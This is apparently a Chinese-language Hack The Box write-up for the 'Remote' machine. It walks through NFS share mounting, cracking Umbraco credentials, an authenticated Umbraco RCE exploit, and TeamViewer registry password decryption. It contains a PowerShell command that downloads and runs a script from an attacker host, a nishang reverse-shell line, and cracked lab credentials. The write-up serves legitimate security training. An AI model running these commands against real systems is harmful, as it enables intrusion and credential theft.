nmap scan
#### port explore
21端口允许匿名登录,但是登录进去没有任何东西
80端口是一个网页,看不懂
111,135是rpc的端口,用rpcclient试一下空用户名
`rpcclient -U "" -N 10.10.10.180 -p 111`
拒绝连接
139,445是smb的端口,可以尝试smbclient登录一下
`smbclient -N -L //10.10.10.180`,失败
2049端口是NFS服务,showmount可以给出挂载的路径和能够进行挂载的人
把这个目录挂载到自己的机器上:`mount -t nfs 10.10.10.180:/site_backups /mnt/`
在/App_Data下存在一个Umbraco.sdf的文件,.sdf是一种典型的数据库格式的文件
直接查看的时候显示很混乱,但是当使用strings的时候,列出了一些用户名和密码
根据我们得到的信息可以推测存在一个admin@htb.local,且其hash为b8be16afba8c314ad33d812f22a04991b90e2aaa,加密算法为SHA1
另一个用户为smith@htb.local,其hash为jxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts=,加密算法为HMACSHA256
拿到本地用hashcat破解一下
`hashcat -m 100 adminpass -w=/usr/share/wordlist/rockyou.txt --force`
密码为baconandcheese
用这个用户名和密码我们能够登录到http://10.10.10.180/umbraco
得到这个网站的version为7.12.4
searchsploit umbraco看看,发现确实存在漏洞
用法是用用户名加密码加要执行的命令
发现确实可以进行利用
先让目标机从本地机器上下载一个shell
把nishang下的revertcpshell.ps1修改一下,在最下面加上一行反弹shell的命令
`Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.4 -Port 8888`
`python3 49488.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "iex(new-object net.webclient).downloadstring('http://10.10.14.4/rev.ps1')"`
成功接收到反弹的shell
#### 目录扫描
#### administrator
查看目标机上运行的程序,会发现一个TeamViewer_Service.exe
作为一个服务器,它一定存有凭据供别人进行远程登录
这里可以先上传一个winpeas进行信息收集
在C:\Program Files (x86)\TeamViewer内我们可以得到该teamviewer的版本为versin7
根据cve-2019-18988,teamviewer将用户名和密码写在注册表里
那我们可以查看一下注册表里的信息
`cd HKLM:\software\wow6432node\teamviewer\version7`
`get-itemproperty -path .`
接着列举SecurityPasswordAES
`(get-itemproperty -path .).SecurityPasswordAES`
对照msf中的破解teamviewer密码的脚本,创建一个python脚本
得到远程登录的密码为!R3m0te!
可以用crackmapexec,evil-winrm,psexec,wmiexec获得一个shell